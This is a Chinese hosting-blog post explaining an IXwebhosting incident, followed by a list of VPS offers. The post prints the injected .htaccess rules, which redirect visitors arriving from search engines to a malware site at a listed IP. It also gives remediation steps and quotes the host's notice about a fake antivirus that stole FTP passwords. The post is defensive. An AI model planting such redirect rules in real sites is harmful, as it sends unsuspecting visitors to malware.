关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- ¥72 每年 2G SSD 200G 月流量 100Mbps cPane美国VPS[主机]
- OVH - 重启悉尼新加坡地区业务 包括 VPS 及公共云等产品全球[VPS测评]
- SmartHost→$6.95 月 KVM-8GB 40GB 2TB 洛全球[VPS测评]
- 米上云→18.85 元 月 1GB 内存 20GB SSD 硬盘 不限流香港VPS[主机]
- hkserversolution 洛杉矶 圣何塞独立服务器,1G 10G独立服务器[U]
- 投稿 数脉科技 12 月优惠→香港双程 CN2+BGP 线路独立服务器 独立服务器[U]
- [ 黑五]PacificRack→$18.95 年 KVM-1GB 30全球[VPS测评]
- 标准互联→新上特惠型美国裸金属服务器 8 核 32G 32ip 1G 带美国VPS[主机]
- DedeCMS 接入百度站点天级收录及周级收录 API全球[VPS测评]
- Pyclouds→40 元 月 256MB 内存 5GB 空间 100G虚拟空间(主机)
- 便宜 VPS $25 年 1G 内存 15G SSD 2T 流量 1Gb全球[VPS测评]
- zji→香港葵湾 cn2+bgp 网络 549 元 E5-2650L 1香港VPS[主机]
- 新商家 edgeNAT→韩国 LG 机房 有条件免费试用一个月 BGP+韩国VPS[主机]
- 做站必选 腾讯云秒杀最后一天→国内 1G 套餐 99 元 年 新加坡 1全球[VPS测评]
- WordPress网站搜索结果只有一篇文章代码实现自动跳转到该文章全球[VPS测评]
- HostNoc洛杉矶便宜独立服务器,$39.99起/月,E3-1230/独立服务器[U]
- Buyukweb 土耳其布尔萨VPS测试(原生IP 1.8$)全球[VPS测评]
- PHPS KR 韩国原生IP测试 (支持银联支付)三网延迟低直连韩国VPS[主机]
- 跨境电商洋码头生死攸关:买手流失资金被冻结保全全球[VPS测评]
- 极光kvm怎么样,便宜大带宽香港cmi vps/美国gia vps低至1美国VPS[主机]
- 一篇漫画,看懂云计算全球[VPS测评]
- 很简单的图片不规则布局样式,纯css样式实现的图片瀑布流布局全球[VPS测评]
- 详细介绍vps云服务器及其作用全球[VPS测评]
- 香港云服务器怎么选?云服务器性能测评对比香港VPS[主机]
- 买了一台云服务器到底能干什么?全球[VPS测评]
- 华凯易佰同比扭亏跨境电商行业回暖H2旺季将至中报追踪全球[VPS测评]
- vpsplayer:新年活动_vps全部7.5折起_深圳BGP/美西Ce香港VPS[主机]
- 加拿大以“国安”为由禁止华为、中兴参与5G建设全球[VPS测评]
- 六一云:香港CN2/洛杉矶高防/CDN,“返利+折扣”双优惠,折上折送实香港VPS[主机]
- Aoyohost:1核1GB/20GB/600GB流量/60Mbps端口香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-120534.html











